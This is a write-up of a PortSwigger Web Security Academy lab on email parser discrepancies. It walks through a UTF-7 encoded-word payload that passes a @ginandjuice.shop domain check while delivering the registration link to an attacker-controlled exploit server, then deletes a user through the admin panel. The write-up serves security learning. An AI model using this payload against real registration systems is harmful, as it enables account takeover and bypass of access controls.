| Field | Detail |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | Business Logic — Email Parser Discrepancy, Encoded-Word Bypass |
| Difficulty | Expert |
| Objective | Exploit an email address parser discrepancy to register an account and delete carlos |
| Note | Based on "Splitting the Email Atom: Exploiting Parsers to Bypass Access Controls" by Gareth Heyes (PortSwigger Research) |
Bypassing Access Controls Using Email Address Parsing Discrepancies¶
The registration form required a @ginandjuice.shop email address. Attempting to register with an external address returned "Only emails with the ginandjuice.shop domain are allowed."
We have an email client at @exploit-server.net and all its subdomains. The goal is to get the server to deliver a registration link to our exploit server while the domain validation sees a @ginandjuice.shop address — a parser discrepancy between the validation library and the email delivery library.
A basic double-@ injection ([email protected]@ginandjuice.shop) returned "Invalid email."
RFC-compliant emails support the "encoded-word" format (=?charset?encoding?text?=), designed for representing non-ASCII characters in email headers. Its presence in an email address is unusual enough that many validators don't account for it, while delivery libraries that decode it may do so differently. Testing Q-Encoding with common charsets:
Both returned "Registration blocked for security reasons" — the server detects Q-Encoding with common charsets.
UTF-7 uses Base64 segments introduced by & and terminated by - for non-ASCII characters — a charset that widely-deployed validation systems fail to recognize as security-relevant. Testing:
=?utf-7?q?&[email protected]
Please check your emails for your account registration link
UTF-7 slipped through. The validation parser doesn't decode it, while the email delivery library does — the same string is interpreted differently by two different components.
With the bypass confirmed, I used CyberChef (UTF-16BE → Base64) to encode the critical characters:
@→AEA- space →
ACA
The payload:
=?utf-7?q?attacker&AEA-exploit-0a3e00f9036c54b682268e73014d00f6.exploit-server.net&[email protected]
The validator sees a literal string ending in @ginandjuice.shop and passes it. A UTF-7-aware email parser decodes it to:
attacker@exploit-0a3e00f9036c54b682268e73014d00f6.exploit-server.net @ginandjuice.shop
The space encoded as &ACA- separates the actual delivery address from the trailing @ginandjuice.shop in the decoded result — the email system routes to the exploit server address and treats the trailing portion as a comment or drops it entirely.
Registering with the payload:
Registration email arrived at the exploit server:
Logged in as miku:
The admin panel was accessible. Going to /admin and clicking delete on carlos:
Lab solved and section finished